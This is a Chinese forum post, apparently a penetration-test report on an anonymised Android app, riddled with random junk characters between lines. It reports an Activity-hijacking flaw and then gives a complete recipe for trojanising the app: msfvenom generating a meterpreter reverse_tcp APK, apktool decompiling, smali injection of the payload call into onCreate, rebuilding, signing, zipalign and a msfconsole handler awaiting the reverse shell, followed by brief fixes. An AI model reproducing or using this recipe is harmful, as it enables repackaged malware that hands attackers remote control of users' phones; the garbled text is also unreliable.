9 y6 f. v7 E1 ~+ X0 p; [ $ [7 a' [. @1 h ~7 w   9 b5 @( u1 U9 v( y % x& j* B. C9 u

! D2 e! m9 P( G) ?, T 8 ?3 z) m) n7 X$ k

$ X( L6 _. B$ N+ d' W; W# R1 N; p. T% F! ] 2 检测结果                    0 c+ w- u) g, U0 c: j- r( l : L A8 K& y3 K) q; E

7 g( z- J. B* X3 x/ r) R) H2 {: e2 I1 Q

9 C3 V; v1 w' `4 T; f8 U S6 M1 L 7 F! p' f6 [/ k# D 2.1 某某某 . N0 J& Y' _+ m' x+ V/ l! G' Q. y9 U1 S

1 P4 m8 }7 r, B" s# W9 J - k& T M0 m1 z9 l1 O- c

! o4 {! a2 J% |8 l + x" Q {$ d K7 Z8 Q 2.1.1检测目标 , H, l' J8 F/ L- x1 {! T * s( e3 M" G( B# I: D8 A

4 r( D2 a- y# N+ ] T* W$ P ! j, [" `% l( ?6 Q; \4 k

+ w1 X4 g" j! m& M) B0 k+ `/ \! a6 Y5 V' U9 v5 p 目标地址: 某某某某某某APP % Y z4 P8 C- p9 Y' a0 ~2 V$ a1 x1 K, a, {# M9 M

5 m# o) R; A* k! E# n h% X3 F/ R( c0 m1 H; u$ g

3 |9 Z9 @, E& m; u 6 }9 s; H' l# D! m3 f 2.1.2检测结果 / M4 Z% ~* o B& J3 h" {7 g3 ]# h% J0 i3 P1 `

7 g3 l, G3 X2 W& d, D9 h: w * ]5 c2 Y% u+ \. c0 Y

8 T+ V# E( q. h/ v' E% J6 _0 L+ n6 ~3 ~3 `# e# K# H$ f) J1 ~& O$ B 2.1.2.1 2 r& W8 T, t+ ] ) d# f+ l( u9 T) D; F

8 J/ F1 F' t; d/ }# i4 U& Q9 U+ M4 k. t( o' ~: ?4 u* P

3 k B+ c; z! l7 j( y6 x $ U) ], s3 n4 b; g 漏洞链接地址:某某某某某某APP . X7 ?$ T9 m& \7 B7 e9 i ' U. t( C# ]# r+ u2 w4 d# V

, I7 B; u& h; h% T" O ; F N) }8 z) e& ]' z7 W/ h1 n

2 t3 B/ s8 K! `9 K5 Q2 ?) p7 } + ^: K$ a* o: R   1 h/ V7 R! N( n( M! t$ u % ]. [& K( m+ P) K7 @) s2 k

3 U5 _5 M7 N" I8 |1 Y% c8 f# g' s" k( U1 {5 W

, F% i% T3 w' C& ^: x - a' H' X- [* S) A8 G7 A- Q 漏洞分析及取证: - R9 o- J% n2 C8 Z V N" a ! ~: v7 q9 ~- Z7 z) O

, h0 x7 g) T, V 7 d+ b- {. X: V6 u$ z% k1 c

9 e% j; z2 _$ k+ ~& m; T / @. o; ]& m' H" l4 {. x                  通过androidkiiler反编译,发现app未进行安全加固, Activity com.minivision.cmcc.activity.SubActivity可被劫持,复现漏洞如图: * {4 ?" ^2 l3 [& ] 5 x* R) G! J' _6 R5 S

' m4 h: q) j" K ( j; |* ^) H6 Y/ A

9 U. q1 I2 n/ z( L ] 6 M; k" `& [, K/ l6 x$ _) \      C, r, ?" [2 v7 N/ W' Y* s 6 C9 b6 Z0 H. _" @7 B. K

6 u; W) n% L# [% @; A/ ]9 A# D( t ' \ U. E; `7 I" ?: t. L* f

6 k3 m4 p# I' ~3 E0 t8 s& v( e2 D8 E }4 c0 q' h4 Q. P                       1 k3 @' c' X8 ^: \8 P( w1 Y/ e( T0 K# m

3 t( I8 ^' F8 y9 r; H F- v ' K' ~! V% }9 s

* f ~$ D/ N$ }7 n - b0 ]6 a; D& J! F3 P- j5 f: l 9 p& m5 j$ O: f9 e& G* {: F; R9 O

8 f t, z/ ?: C. R& i# N. c 1 n7 A* G( S X0 N) ?

& _" l! ?' @# k' ]3 Q& g + u, L; j: I+ o: G: G' [ , y* p X2 H; P % q0 ?1 G. a( B5 Y' g" O

" ]7 r' n, X" k- n8 ~4 p% Y4 v% ^0 C; V, Y# K

( M: Y* z" S% \$ g 0 K/ W. E s& v# ], |! e8 t7 C + f# Q" |: C; V6 v# S" Y4 \. P4 ^- Z

( W" t7 o: \! x3 j, U ! f2 d' m7 x" B- D

+ `; z3 M% L! j$ q S. f) S! x3 u$ s 8 v7 |* X' G. u5 w- r4 g# t1 v( y 漏洞危害:高 + K2 @' J! T8 U2 q5 v2 b# U4 l; o; Z: `1 b! `, p

" k1 o7 H% i4 v8 N $ d' f- v, u0 h% x/ G+ W5 _0 _
4 T9 p: `% v w4 Y& u8 \6 |0 y 9 ?, Y0 d1 G) ` 4 {/ |7 G2 r5 Y/ ]% X0 G R( Z, D u& ]6 x$ O& @$ D: S' l x6 w9 Y. r8 L2 f4 l) E4 c- b9 n0 a; S+ {# n3 Z& H) i2 {: M; H6 x/ t4 R+ ]9 M' K$ e& T2 E) G" Z3 {/ m- G* \$ ]3 L; Z$ L1 Y" ]: C0 ?$ E, R2 b3 A# J: l# W# y/ f, r9 P& S; u, J! N0 z: v8 s; ~. A. h: c, G8 t6 z0 e* A4 F+ l# A" `+ q# L' }$ k( f* O) Z( |% [! J) a& R( `( N; s& a' }* S9 ^8 \# r: C+ P! {9 P/ ]* D8 t( l8 z1 u9 L) ?+ _$ v4 S1 o6 w6 [3 U9 m4 | D$ u2 ~6 O9 w1 z6 ]1 ]1 x- r- a4 b* q. E2 j* t. A' U* Y2 i C6 S4 u3 |) }3 C; z' b. a1 q: i* x6 f. |3 z2 B7 z. R0 \$ \! ?8 w' g' w0 F" D+ x, h4 n6 e' a7 Q" L2 K
% C( D: I0 i5 n9 e6 t * V; B% r/ i/ f% d& n" o

# v" H5 j' D1 H0 N6 N - R. }, k* ?, u9 q! t 严重程度 9 S' U4 i: `/ w8 t. h0 c7 H( C: l, k9 C# O8 ]& q. J1 A

: F: C$ V/ P! X2 B5 q' i 6 v* e$ w% ~! V8 j: q" I) |; u/ P
+ x. o& N+ i8 V) y- t e, L) ~ $ f3 l' F; o* b& ^1 N) J

- S! U% Y# T8 c : h1 h; o: S' |1 { - J8 j" K1 v) z4 t6 N3 O9 r " J3 s% G% W2 T) _

. ?# Z- ?& \9 e6 y% y$ W+ i4 @! \& |7 y% A' c8 ?5 G, w6 G8 j7 c: t
) H# I" b- M( y7 H( O) r 0 _* h' W0 A# N+ E) R j

& J) ~* R" B6 m& c1 M! M w7 X/ C/ V2 q / R. a$ c5 j5 w' g 1 D; Y$ k( T1 P* E

, a: r+ w8 q% B! N $ [+ @8 T+ o: |9 Y6 z2 E1 p+ l! G
/ t& R% z( n/ E4 C& E! j S/ p7 u " ^( q6 ^+ D- H9 H

, y0 h5 _; s# \$ K% q ; [9 |% X& t" s! k 7 C4 S8 `$ A' s ?, A) U; \ 4 A# X" R; Y% d; c9 c& s# [6 }& L4 V

6 m+ F( V5 y3 U% ]5 F; b' h* d$ \. s% `% o2 i
( \* [8 f: y/ W 9 a- [& K; T' B5 Q) I

* S( n% f% p0 U" S& e2 ? 5 b5 x- Z( P1 \! ^, Y   ! b- F+ V( F9 j$ K( }3 s, u2 h3 c

& h3 `/ a+ e6 n6 S6 N( V3 q % q# a q$ B4 ~0 X3 U2 T# }+ v
9 l# {- e$ \1 x % q5 u+ ]6 c/ Q- t1 f! l3 n+ {

! R- `' S# L' P: _ ! U; G4 A# W3 ?$ ?) F - ~' p$ N8 d, ?. {, j0 _, n $ |( |+ e& w& G, u n: G

$ p% }: |8 l* Q R7 o 2 B7 s% g+ A$ m! _1 P. Y* u2 g: ^
. |3 h) |% w% q( R% h+ f( A g4 Q ) J/ k) ^6 W; P. \

* k, @: R' ^4 }/ c. J 3 o# m# Y8 ?; j! v+ p& {' Y8 J   8 q& w; D6 v# X( V5 W) B # H7 N3 |/ r9 o

& R2 t, h3 i3 \$ X 7 f4 ~' D. @- R9 P' i
8 X, z( k, T7 L C! |6 ]* r7 ~: ~% E 4 C/ M: m7 S& f. @6 e
2 c" j+ q$ i7 J2 F ) _8 K, ?/ | p& \

* B! j& i3 o1 V2 I 6 P% M, E4 \2 S$ W0 X   " l2 m: J# D4 T9 i" V$ m+ f $ ~2 B' c7 f" L. o9 \

7 p& a* X7 R1 `% Q" t, i/ a1 j |* D- |, r

. n1 M8 N4 E1 I# m! C6 ^ 4 Y, u% `* `! P+ `; E @ 修复方法:在 APP Activity 界面(也就是 MainActivity)中重写 onKeyDown 方法和 onPause 方法,当其被覆盖时,就能够弹出警示信息。判断程序进入后台是不是由用户自己触发的(触摸返回键或 HOME 键),如果是用户自己触发的则无需弹出警示,否则弹出警示信息。 0 d7 G% _! S2 g* @9 L( ] 7 X6 f, [6 E' o' }( N4 D

: F4 T x- [2 a+ U7 K* K% O" m9 ?' [

- t0 o3 N- [4 y; ^1 g {7 e( i8 P2 ~. c$ q! L$ p5 P           ( P) ]+ v; V6 p$ H' k 9 x8 X$ a1 u# W. K

& Z7 V6 D% b; N4 F W ' y: }# }; f+ x5 o" a }

& D! R4 [! H- ]& K6 m- m. u$ a- i- O4 |1 z1 v4 K9 o6 y   - R6 J* d" L V! _ 2 P, ^8 N) ^( l& ?% f* y* S& k6 \

6 j* x1 l9 I. W2 J+ a: P% H 6 p& `+ l& @ _) O5 O

/ Z3 E/ B3 Q2 e6 B( ^, c6 q 6 f+ F! _& t$ \! c# H; C. k 2.1.2.2 4 A) }6 Q8 Q$ D, v/ g9 E: F' b! G+ G8 I2 J4 Z! u* E

( m& e2 t; b+ `% t U9 r. k6 b! k& d1 `( E# b l

& C0 F3 F. E. d% v D3 T+ n2 q" R# ` 漏洞链接地址:某某某某某某APP ) ?/ R5 T8 L, p1 }) |& @ ' \& J0 {% h7 @/ H

( z6 z) I# Q) _2 e# L, B( w& t9 D 6 ^: r. R+ }+ z7 [, R4 l, ?+ [

, N/ Q# @1 O5 t n; _) i( ~ - K# S( X" d, Y8 m6 z; P4 g 漏洞分析及取证: ' E" O/ |: Q8 g3 ]/ O ! N9 z3 Y* O/ E" B: v' l

0 A. |. z) _/ g* T" J& l* C5 ^6 z% k; U: M0 E4 Y7 Z7 a! U# d

3 y% ?1 N7 V# }& T' Z3 ~9 r7 Q1 F b : Q% r9 D( A. B0 L, c# H                  通过反编译,发现程序未加壳加密,可直接反编译获取源码,经过测试可修改app代码捆绑木马或者植入广告等操作,复现详细方法如下: , B. g9 U: u0 O; ?$ w 4 v5 S2 h& h. z. |& H

" I4 Q" T0 Z# a' }& q2 ` 0 d0 U4 M8 U- h# w9 M7 f$ y$ t% ^

0 r3 h5 J# A p" T" l+ N + j3 b6 D1 k. W8 d2 u( ]0 f Metasploit 生成木马 apk 5 A R1 V; Q& c: { $ A7 `, e1 i2 l! l5 a k" Q

( p) P2 E8 a; P* O6 g7 } & t- N/ p2 O+ q6 X1 ^# N E2 j" h

0 `" [, M" K6 X% m # V9 |2 ?- [; v& V1 i9 p msfvenom -p android/meterpreter/reverse_tcp LHOST=192.xxx.x.x LPORT=4444 R > cockhorse.apk , l) g/ v4 M4 z! q2 t; X) E& u! A 8 H- W$ ~: h2 @7 `

. m$ F" `8 i/ | s/ B M5 z+ S5 G( ^0 Y

9 m* c, a2 V. C/ w- z+ c $ ^" N9 U& j: l& @9 b 反编译目标apk和木马apk 2 `8 G% B: c0 Y4 c$ |" G1 d7 s 6 }2 B; `4 d4 o5 Q/ n& j

5 k' x6 u* T5 ^# {0 _5 e" H$ Z5 D* Q " b4 i v9 X9 H- ]

, Y/ z, o. z0 h; K R B8 R3 J- i, {) h$ [ apktool d target.apk
7 J4 i4 U1 Z1 P4 t$ O3 V1 o& F+ Y 3 ~+ T& t7 L0 b; t* n. i& ` apktool d cockhorse.apk
! R$ G, j2 ~1 B: T8 J# f& }1 A$ F & P, I. D! G$ c: v, @

5 P) b8 x# s9 Y 7 X% D0 I) v4 F9 m0 r7 Y! O

5 {9 {0 M V5 [4 B& O' O 2 i9 G1 ?: t' U4 N4 z2 n; b/ ]1 u* a 木马 apk 注入目标 apk ! W1 U7 A8 ]3 z) }5 g9 }3 h/ t # x+ p6 Y e) s' Y) F- X

* R. v' `6 t& ?8 Q& X1 ?; `7 B8 x6 q

, M3 a& m- h. V- d/ C6 `5 s0 I/ y ( [7 b& E9 P) n$ }/ k 在目标 apk 反编译生成的文件中找到启动 Activity smali 文件,并在 onCreate()方法中添加如下代码:
: k y! H! E; ~0 Y, | 8 m, {" y# c! _6 e$ k V invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V
7 z G6 d \8 \# I% D ) Y. n; i, t' S; a! D5 Y7 u! r

- c- I! m6 _: y: y, G, v+ } 0 b$ T8 P# Y' g+ W! |2 J

: E' `% l& U& {1 a7 `7 l# V* n( z" n ! M7 R$ i, R$ ?8 [% O# Z 将木马文件 AndroidManifest.xml 中的权限放到目标文件 AndroidManifest.xml 中,去除重复 4 ]: G* X& b, A2 z0 z1 k# p$ M* A" z9 ?& u5 Y

* O4 _: O' ]4 K6 Y; ?) p8 K; V5 z & `0 Y# j7 ]6 U; J6 c2 n1 [

2 Q! V* z, W5 v' H" L* y+ X$ w# ?( l6 o) v# F4 c 将木马文件的 smali 文件放到目标文件下,例如 com/metasploit 文件复制到目标文件 com/ & r1 j9 x" ^* K# j. O% P 5 M, |; u6 |' D0 W

* \/ {7 w0 L+ y- e+ j$ C C" e8 s! o' A, Z" r

( l y! U& p. H3 s# k l A/ { h: m 回编译生成最终 apk 7 `6 r6 w( q% E5 J + H$ L( Q& [( p( E7 C' z

0 k# G$ i+ p( Y! S4 t9 R: x 1 Y5 T8 [+ z* }; B- y+ }

X0 c$ y+ i- Z$ b: e" ?; D& L5 y7 X ) h7 x3 s9 u. Q9 n/ s# n 重新打包 . R3 m2 G. S& W* m. ~ ! w9 b5 B5 O+ I* f/ Q p

' p: p; S1 ?$ }4 F% ^) g & X' `3 c* Y# w1 h9 @" S U7 d- S

a, v/ Y; S7 r" |6 u" Q& w. ?& E 6 b2 p7 V* D; C apktool b -o repackage.apk target_app_floder 3 J- C& j; v% o M' b . N( ]8 w8 u: s0 q% q* J# g/ e

! z- D$ z1 ]3 }6 M0 n" [9 X & i. c8 T3 @0 `0 ?

! y3 Z8 B) W2 E0 B2 E0 P R% V6 | ( v; p j6 J3 c1 i 创建签名文件,有的话可忽略此步骤 $ t6 F5 j8 e, Y 5 F# K% z6 T3 _2 ?# c' E

_* j3 E: U7 i4 M 9 J5 |; F* o3 d @7 }# ]0 F

6 M" }, m1 Y' \/ E; Y 0 ]% W) a( s5 I keytool -genkey -v -keystore mykey.keystore -alias mykeyaliasname -keyalg RSA -keysize 2048 -validity 10000                $ Y, N3 I6 q v6 K" \* f $ D3 p0 |- W! X. D) O0 z

8 @& {$ d: G) Z9 P# L# e, U0 g 1 y' J& k1 j) \$ d3 {

9 N, O* k* R# ~- ~8 w 0 f; o0 v2 L3 J; ]8 L; n# {* J 签名,以下任选其一 2 u' i% B" b2 C; z' ?- f+ ~1 p5 K& z. x; Y$ W G, o

9 O2 a2 H& u9 G + I- i) ^) f+ z* M' b# c( n8 I

+ x7 t* J) r' H6 T2 a. g% k8 S % A# h1 G3 Z) y9 _8 z( @# {/ w jarsigner 方式 : i6 n! d+ ]8 d; o5 ?; @4 e 5 ]$ u+ X3 f+ ]" F5 l% w

% P f0 n; r2 C, n% O0 d o' ~0 X* D( `

8 i4 Y2 B# e7 J2 {/ I# n, U2 ^' n# O# F jarsigner -sigalg SHA256withRSA -digestalg SHA1 -keystore mykey.keystore -storepass 你的密码 repackaged.apk mykeyaliasname + [( T) e. ?3 k% x: ?7 w( |! b8 o & s0 h9 S( k$ o1 U) b- g% I! o9 p8 r& i5 R1 X

9 T& \- Q. k/ N" m$ U- m6 \ ~7 Y0 V" ~8 V

+ ]7 \+ a" B+ ]: ^4 j. _) L7 z & Z6 c' D; n6 e9 I apksigner 方式 9 A& i+ g( r2 e , q1 V7 O! }! F' w

- O6 v* p5 n+ ]5 e+ T4 _8 p( F 8 o' C- D# v1 G" ~3 @

( j$ y# \0 ?% E! t) D 0 s7 f4 h4 l7 [, O9 c apksigner sign --ks mykey.keystore --ks-key-alias mykeyaliasname repackaged.apk . q3 I6 N2 f Y/ G" t* y/ J/ c; b/ P+ x2 h( u' q, t

; h8 I0 G: D2 f; S* z3 Y & d8 J4 m! N% v# }; X1 z

9 B: G+ K7 W& [( O( W* W7 W& n% h. A; I% y( B 如需要禁用 v2签名 添加选项--v2-signing-enabled false 9 y+ u5 c7 X% h# U: D . V2 d) D4 B5 Z7 [9 X* L- [

/ z& h4 }7 Q& S+ Q$ U0 e1 W, l& a; a

. D, q0 k" K, |, l 5 B9 P& @0 c" Q' S) p 验证,以下任选其一 8 R3 e& O& o+ @( C% [9 ?, z 4 m2 W% e0 ^: l2 z( e5 f5 u

4 {: Z) E( z% K- C5 @+ K1 l- r/ [& w ( S9 {$ E: h% {/ ?' R" h

, A% w2 X+ b" i1 f% x' ?- n+ A! y$ a9 ^3 G u" t- d0 d+ g jarsigner方式 ( X6 F8 J, m8 }+ E- D+ {* C % G. d9 _- D2 f3 _* H

2 w4 a3 | r8 D/ P L 7 t% R3 r' O* s) {- [

* n/ j* Q2 M: Y V0 G6 p, |" l$ o$ ]! k+ J jarsigner -verify repackaged.apk + E' F" E3 g0 U8 i- J) U, x6 X5 ]$ i* R5 V

& {# n+ J1 o U- ^ % B( m% E0 Y7 g- J; Z

# F+ P( q- E' I4 s; I( e, C! Q * k" g( N2 _. Q apksigner 方式 8 _' t( c5 I2 b: z& Z) K9 ? 3 A3 V ?% c/ v1 H' B

3 p6 j3 ] |8 Z; p/ b6 o , U8 h4 [% ]6 |. z8 }

4 Q6 z0 S) E& r* B+ G / l4 d" U% b& w5 s. G) u+ a, j apksigner verify -v --print-certs repackaged.apk : T3 x3 E3 o# T g @; _4 S# G, E, z6 V6 q0 z& E. o3 W* e

" u) f( r/ }# d; U9 g 4 I' m! u2 k2 W% V

# F' q7 A- d( M4 S+ ~) i$ r: ~& f " L3 D% l# V# F0 N6 g0 X9 c- q$ k keytool方式 6 {) j' J4 U& \0 p' A, k( R$ g" X ) j9 l/ r2 ?# |6 E5 T

- ~4 p3 t5 ~7 \( Y 8 X J6 G& b2 s& d! k* B3 f8 H; w

2 e3 @9 j/ f% p+ B# c0 D " R `4 L; j$ }8 R& V3 K keytool -printcert -jarfile repackaged.apk ( {7 n; M x, o3 W1 v6 O 0 Y; Z2 L8 H9 k* ~8 f4 s9 r

% S3 ^6 F/ m6 Z ? # W9 F W; Q* H' j1 u

* {( [9 B: `1 Z4 s ; H, j0 ~ E: l) R1 D 对齐 * x9 d# T. V+ D' D/ U8 t; G$ C 6 j* z2 y. Q9 h/ {- y

1 Q; f1 m( _8 L3 I) [1 r . p2 J* W8 B5 k7 f$ d

; @; h% ]" Z, F4 J$ {/ N6 F ( a4 \% S% {& `2 Y& r 字节对齐优化 ; g+ w5 g/ O/ `3 c, i- p& X/ O+ X( _. p! _) p

' @8 N" f6 w. D1 ]$ p8 l ) [6 V6 R, [% J

% _7 i( ^- x3 u2 e- S 6 g& D1 F8 d, Z+ E zipalign -v 4 repackaged.apk final.apk 6 M4 k, n* x$ ], [9 v0 D n' t& @7 c- i( q {& @9 w

8 _% U/ k( X$ x5 ^; F; c8 @/ m& U; v) b7 \% d* b1 Q

! u- q' T/ U' U# q! L: b1 f2 s. [6 c$ H) T 检查是否对齐 , K: {3 L' g* z ' X G8 p5 i! E5 J

, D- P0 U0 A9 Z+ R4 g $ Y1 \4 Q7 z4 r. Q

+ ]6 k( }5 j% ?# F7 V1 H- D6 v1 x+ \1 `4 S5 Q zipalign -c -v 4 final.apk : p% b& E9 C y2 W% ^7 B7 n : P. s2 N9 U4 m, G$ C5 I& ^

# X# q/ L) w- F4 @; v" p, ^ z0 G2 P1 Z) W5 E# Y% A$ \% `

3 l& q, t4 V) ]- u' X: d, [+ k( p: Q ' Z5 p) }! @ E+ G& o 注:zipalign可以在V1签名后执行,但zipalign不能在V2签名后执行,只能在V2签名之前执行 3 H, w N2 e8 z) r2 j9 K) x# F+ u* g/ U9 P2 N

2 O$ J! Q; P! K7 A- a% T% }3 T0 A% x" |6 b

0 z5 Y5 c" J+ X9 l3 L- ~8 B$ u) A: `1 X/ t& W2 q6 i) p 启动Metasploit控制台,配置参数等待上线 $ Q! d6 ?6 R+ ^/ H0 a ( K4 A- a8 W: G) D4 x. B2 `

7 @( ?$ K: K/ z" \9 e) X+ f3 A" ]# b J: h

) T/ T8 Z3 K) w% \5 | 4 d. M( b: {$ [! R; o 在终端依次输入如下命令 1 @& Z1 H1 H, b3 L& E( m! s# _ 9 x) \; u1 B( ^9 N# X7 o5 ?; C

& D h8 l. i" Y, B ' Q( K* s# m1 W$ O H; c5 t3 ~# q

3 o# p3 ^# S1 F0 d c ; a! u* U- U$ P; q0 S; E msfconsole ! P' {; A Z3 I; Y& v) G- G 2 W& e4 e" s# j& i- n" ^9 u) S

% ]: i( p e+ u. d( l, N3 n0 A. q( X! [9 T

$ @% R, M* L, M% w9 } 5 w# ~, W6 q* R9 ` S! v* I8 b use exploit/multi/handler `. [& k/ C* j2 O 8 Q. R: q% B' M' E) l4 w

# o6 }: [0 N0 {3 s ) p4 o& |; j8 Z: M+ V( j6 |

8 X, u. {3 {4 B$ S# s. `0 h / Y- E& r1 _4 G$ T set PAYLOAD android/meterpreter/reverse_tcp ) P5 n& W& L b( h+ M+ E8 Z$ |% C: e$ H( a, ?( Z( I7 z+ t

. g6 L1 Q8 j& [/ r. Q 5 U' @" F) R6 F) R5 W @

* X7 m8 R8 l4 o3 q 3 H# N9 W3 ]. B' f2 v, Q* R" {4 R set LHOST 192.xxx.xx.xx 3 r$ ]- J3 D) w9 D & @2 g9 N* X% ]

2 W) D3 b9 Y: l! |: z3 W* S 3 v2 B4 T, i" Y% ^3 S% D

; ?) [1 e3 S& D/ T! i2 H % d# r$ F( B( m set LPORT 4444 ( u& m; C2 ?: n& } 2 c' F! j: [6 I n

8 I1 P$ _" m! T; X8 e D2 _* z# ~! z' C. J( K- L2 ~# r9 n

8 \; f! Y4 I& f) _* Z7 G' W% L" w exploit ) {) ~! u* S, f % w; w! ?, e4 i7 h# {/ W& J

1 Y. E$ W% N& k. U6 {2 t0 S $ Y! k5 I6 s/ m1 c8 p I

* _9 E9 J2 M3 a( ?* _3 U0 }# b) | 5 z7 h) }4 C& _% l9 | 之前我们把入口放在 MainActivity onCreate 方法中,当启动目标应用进入该界面,就会连接成功,如下图:               " D$ \$ X9 @7 B& g# ~8 X: B! l- c7 M- i/ p9 M# B

& M) J- ]1 k# K8 h/ r) `. B% X( V& V- s# w7 ]5 E0 R8 c4 L

6 R. W T9 Y; S3 I& i/ o. X+ V1 v" ~' ~5 z k' g+ J 漏洞危害:中 5 D% z( r) ]! a ' B z; W$ k0 H4 n

, ~. u2 m7 _+ V ( J: G6 O/ U5 C% `
. L5 f. T: D x( m) I 8 Q4 F: `8 P) g- I1 ?7 G6 D * }/ D1 D( E& K# n) n3 e2 R, z& x8 K6 G& D$ U9 a ' ~+ W) \) C! H+ G9 e9 Q% K( p. l% s c( c& s4 `$ \, C* `+ n$ m7 T9 {) q. E1 |. L6 \3 y' Y4 x2 H3 ~4 v: N4 ?' ~+ P" [4 a& a- J9 `) C% T: X- @+ [' v! }; ^+ B: u, ]5 t# z/ @1 F8 ]) N4 Y- @" b; Z* C9 Q5 ]) C% H- Q7 C$ d2 W: m( a( I, U' w2 ?' p# ^) Z6 F W" S" [: R/ J4 i* X6 s0 r, p9 `; b( k- J( W% S [9 c9 p0 i0 u1 [, ]2 `# ?4 q! ^! M/ r& h" y# |- z8 L- G4 u5 b2 }0 I$ o$ N) r- b o3 v$ m- k3 L; t" l) W& F/ W: g2 g* @* L( @" ], V! R! j! B8 b' {1 x0 B5 s) i! x2 b$ [0 r" V% K6 K, J% N$ r! B: ]& t- K# U" V9 F* J* x, N* n7 V! i6 [# w9 }; B% F3 m, q V1 t# x* e- k+ v" g* P8 x m$ [0 t9 R- Y: V' K* w. a( N
+ {9 @% \. `1 e, U9 _ : ~; h2 [. \" I

; r* u5 D: j& V : l" ^; m+ Z: W/ K 严重程度 , F! l* { s" t 3 G2 D5 u$ t- F7 c& h/ e( h- t

9 W. V+ h9 t( s5 y' [! g ' x0 U- \3 _' _3 U ?# c
4 Y! P$ d- Y; }8 Z: @; n ) d3 F4 O C) [, j+ g, w2 ~5 i9 T+ ?

% h6 Y8 w0 H3 l9 ], |+ @ % i: ^( c8 G3 U- n$ i. w : S0 l/ _1 ^: b3 c3 i' a2 t . S$ W/ G R9 U. C& J9 R! q# |: ?

! S5 f% p$ @ o) H . \. Q+ P, W: g2 q3 E+ X7 m
! N) i% A. @# ^( _# ^6 D9 q, j% d' g8 F

+ D" _2 |* C+ |- ]& D7 t # R( e1 O* {, g! w' E; ` : {3 W) N8 X2 H' H& ]% ` + @& u7 z1 L) {

# i9 Q$ T/ d7 d5 ? d3 L/ e# C/ i! K4 i! n; l
' K6 t3 O( z/ V. D 3 V. }- `! o' x7 _2 p9 M. p

T. P0 C% C# b' Q 1 F. a4 h( M; u7 x " E9 l: d/ b7 `% S 9 o* K$ v6 H: \

2 u3 S4 K, o* p 1 q0 w4 ?/ [) i
1 }0 l6 ]" ^, P8 y+ w" Y, L " q) G: l& U) `9 w+ D . c0 m; v$ B2 s7 f0 d- e + [0 Q1 D. r/ u

; d6 P# k. Q" |. V9 W9 l8 w4 T4 Q5 a" n: `0 ?. z& q   , g* b+ c, G! E+ z* v, i1 ]: `; C ! X6 `$ A3 \$ m# I1 \ H5 a

/ {% L& b9 z3 L/ y; ]$ X ( E; _8 c' b2 `- I+ V. J
1 d/ e0 \' O1 f1 G ' B J7 E% a) e9 S1 s

. i( D' {8 d) j/ n; X$ m0 v O x. E5 W) N% U9 _2 F; H* A 4 C; O! m( Y" p! ~ Q+ d; d. R * {/ I/ [% V/ J4 R+ h5 D

9 r& M) W r& m2 s7 H. \5 C. E4 L% \) _# x4 g7 ]6 v1 J
# e& J6 y4 [8 l4 ^+ I9 | ( ^0 L0 ^- e T; v; _% t) J4 D 5 Y6 h5 d9 u7 T! n; m* O; o+ F( y4 f, W. F$ B& q

) W$ d# s# a0 E3 U$ k' [' v7 i 6 J# A+ d# ]5 i4 T" `   9 i2 W5 P5 V) p7 b7 q- H U) \; S

) {9 D- {9 q) f o- v T1 U8 w9 _9 M8 B' D
) K2 j1 R- W! ? s1 f6 `6 F * P/ s8 I5 u' K G7 c
9 m1 H1 ^" K* _0 X : Z, Q9 R) u7 E; {

0 n- |' C! c9 G0 j , j6 U: |3 W# S# ~# |& `   5 ^: D) @- D0 o+ u- e9 { 7 n+ L* K* }2 M4 t* L$ ~5 V

+ U$ M# W) L; `( V+ s1 B. u( o6 n, u6 z( W. E

" R! `% N/ J) W5 `1 ^. _+ a0 @9 G+ i ' c' l3 f+ f4 d$ t1 x |3 h' H8 ?( { 修复方法: : }+ T7 K: o: u3 X0 C/ u1 i& k9 A* J * M) f6 }1 c1 Y5 \! ]0 U- y

) `# o4 \4 w Y1 O6 F; R / L0 t8 O: E* Z* X0 o& w

! r+ w# m2 C( W" d1 G! q: L, H1 t) x) s& E2 I$ h4 j0 u               1. APP 启动时应做签名校验防止二次打包。
V. }- @- t* D$ q: f. K* b $ C$ @7 E1 D* ` 2.
建议采用客户端、通信和服务器端联动防御方案进行安全防御。 ) l* ]1 v1 J1 r. M - S0 }. v: f+ g

6 Z. Z) u+ o2 g7 y6 {* d1 A! l- u0 r& ~' V- H) |' I. S - U3 W& N% I- C$ x6 i 9 w, y8 `$ N) N6 W

+ s" }' h, m8 M7 B$ e4 B* A : R% r; ?6 V! `7 U3 x3 [; f8 ]   6 K) r" u5 V! ?) N8 s6 N' ] + C8 O) E- n0 M+ J8 [

5 v- C9 L6 h. `1 H0 Q8 |1 c ) d: {' x; C3 j0 {2 D2 p / {; u, q0 O" d% f. q$ V- H. Y6 T' C5 @' q2 q8 X% i

. O% L W. A2 s( w" @8 l q+ b / F7 |1 I. ~. j! r
- L& L9 U# `# h " p4 E/ i5 a5 S: [: k: [- c, t" K

. g+ P, {6 s. `. D # J4 K/ M4 v" U- }' G
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表